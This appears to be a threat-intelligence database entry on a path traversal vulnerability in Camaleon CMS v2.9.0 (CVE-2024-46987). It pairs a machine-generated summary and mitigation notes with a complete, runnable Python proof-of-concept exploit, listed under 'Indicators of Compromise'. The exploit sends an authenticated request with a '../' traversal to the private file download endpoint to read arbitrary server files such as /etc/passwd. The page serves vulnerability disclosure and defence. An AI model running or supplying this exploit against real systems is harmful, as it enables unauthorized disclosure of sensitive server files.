Camaleon CMS v2.9.0 - Path Traversal
Camaleon CMS v2.9.0 - Path Traversal
AI Analysis
Technical Summary
This vulnerability in Camaleon CMS v2.9.0 involves path traversal, which can allow an attacker to manipulate file paths to access unauthorized files on the server. The exploit is documented in Exploit-DB (ID 52531) with Python code available, indicating proof-of-concept exploitability. There is no information on affected subversions or vendor-provided fixes.
Potential Impact
Successful exploitation could lead to unauthorized disclosure of sensitive files on the server hosting Camaleon CMS v2.9.0. This may compromise confidentiality but does not explicitly indicate privilege escalation or remote code execution based on the available data.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is released, restrict access to the CMS and sensitive directories, and monitor for exploitation attempts using the known Python exploit code as a reference.
Indicators of Compromise
- exploit-code: # Exploit Title: Camaleon CMS v2.9.0 - Path Traversal # Date: 2026-02-02 # Exploit Author: Sakshi Velampudi (CyberQuestor) # Vendor Homepage: https://github.com/owen2345/camaleon-cms # Software Link: https://github.com/owen2345/camaleon-cms/releases/tag/2.9.0 # Version: <= 2.9.0 # Tested on: Linux # CVE: CVE-2024-46987 # Authentication: Required (auth_token cookie) # -------------------------------------------------- # Description # Sends a single HTTP GET request to a vulnerable private file download endpoint # Uses an auth_token cookie required for admin access # Detects invalid authentication via redirect to /admin/login # Displays a preview of the response when file retrieval succeeds # Usage: # Run only against systems explicitly authorized for testing # -------------------------------------------------- """ Camaleon CMS v2.9.0 - Path Traversal Proof of Concept """ import requests print("\nCamaleon CMS v2.9.0 - Path Traversal PoC (authorized testing only)\n") # -------------------------------------------------- # 1) Input Collection # -------------------------------------------------- target_url = input("Target base URL (example: http://target.com): ").strip() requested_path = input("File path to request (example: /etc/passwd): ").strip() token = input("auth_token value: ").strip() if not target_url or not requested_path or not token: print("\n[!] Error: URL, file path, and auth_token are required.\n") raise SystemExit(1) # Normalize base URL to avoid malformed paths target_url = target_url.rstrip("/") # -------------------------------------------------- # 2) Request Construction # -------------------------------------------------- url = ( f"{target_url}" f"/admin/media/download_private_file" f"?file=../../../../../../{requested_path.lstrip('/')}" ) cookies = {"auth_token": token} # -------------------------------------------------- # 3) Request Execution # -------------------------------------------------- # Redirects are disabled to capture authentication failures. try: response = requests.get(url, cookies=cookies, timeout=10, allow_redirects=False) except requests.exceptions.RequestException as e: print(f"\n[!] Request error: {e}\n") raise SystemExit(2) # -------------------------------------------------- # 4) Response Handling # -------------------------------------------------- print(f"\n[+] HTTP Status: {response.status_code}") # Invalid authentication typically results in a redirect to the admin login page if response.status_code == 302: location = response.headers.get("Location", "") if "/admin/login" in location: print(f"[!] auth_token may be incorrect or expired (redirected to {location}).") else: print(f"[!] Redirected to: {location or '(no Location header)'}") raise SystemExit(1) # Successful response if response.status_code == 200: print("\n[+] Response preview:\n") preview = response.text[:3000] print(preview) if len(response.text) > 3000: print("\n...output truncated...") raise SystemExit(0) # Other failure conditions print("\n[!] Request failed.") if response.status_code == 500: print("[!] The file path may be invalid, or the server encountered an internal error.") print(f"[i] Response length: {len(response.content)} bytes") raise SystemExit(1)
Camaleon CMS v2.9.0 - Path Traversal
Description
Camaleon CMS v2.9.0 - Path Traversal
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This vulnerability in Camaleon CMS v2.9.0 involves path traversal, which can allow an attacker to manipulate file paths to access unauthorized files on the server. The exploit is documented in Exploit-DB (ID 52531) with Python code available, indicating proof-of-concept exploitability. There is no information on affected subversions or vendor-provided fixes.
Potential Impact
Successful exploitation could lead to unauthorized disclosure of sensitive files on the server hosting Camaleon CMS v2.9.0. This may compromise confidentiality but does not explicitly indicate privilege escalation or remote code execution based on the available data.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is released, restrict access to the CMS and sensitive directories, and monitor for exploitation attempts using the known Python exploit code as a reference.
Technical Details
- Edb Id
- 52531
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Camaleon CMS v2.9.0 - Path Traversal
# Exploit Title: Camaleon CMS v2.9.0 - Path Traversal # Date: 2026-02-02 # Exploit Author: Sakshi Velampudi (CyberQuestor) # Vendor Homepage: https://github.com/owen2345/camaleon-cms # Software Link: https://github.com/owen2345/camaleon-cms/releases/tag/2.9.0 # Version: <= 2.9.0 # Tested on: Linux # CVE: CVE-2024-46987 # Authentication: Required (auth_token cookie) # -------------------------------------------------- # Description # Sends a single HTTP GET request to a vulnerable private file d... (2840 more characters)
Threat ID: 69f311cccbff5d8610aa56e1
Added to database: 4/30/2026, 8:24:44 AM
Last enriched: 4/30/2026, 8:25:04 AM
Last updated: 5/1/2026, 5:48:40 AM
Views: 12
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.